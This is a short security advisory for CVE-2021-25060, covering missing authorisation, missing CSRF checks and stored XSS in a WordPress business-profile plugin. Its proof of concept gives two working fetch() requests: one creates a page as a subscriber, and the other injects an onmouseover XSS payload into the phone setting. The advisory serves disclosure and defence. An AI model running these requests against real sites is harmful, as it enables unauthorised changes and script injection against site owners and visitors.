Five Star Business Profile and Schema < 2.1.7 – Subscriber+ Page Creation & Settings Update to Stored XSS | CVE 2021-25060

Description

The plugin does not have any authorisation and CSRF in its bpfwp_welcome_add_contact_page and bpfwp_welcome_set_contact_information AJAX action, allowing any authenticated users, such as subscribers, to call them. Furthermore, due to the lack of sanitisation, it also lead to Stored Cross-Site Scripting issues

Proof of Concept

Page creation:

fetch("https://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "bpfwp_welcome_add_contact_page", "contact_page_title": "hey there!"}),
  "method": "POST",
  "credentials": "include"
});


Settings upgrade:

fetch("https://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "bpfwp_welcome_set_contact_information", "phone": '" style=left:0;top:0;right:0;bottom:0;position:fixed onmouseover=alert(1) x='}),
  "method": "POST",
  "credentials": "include"
});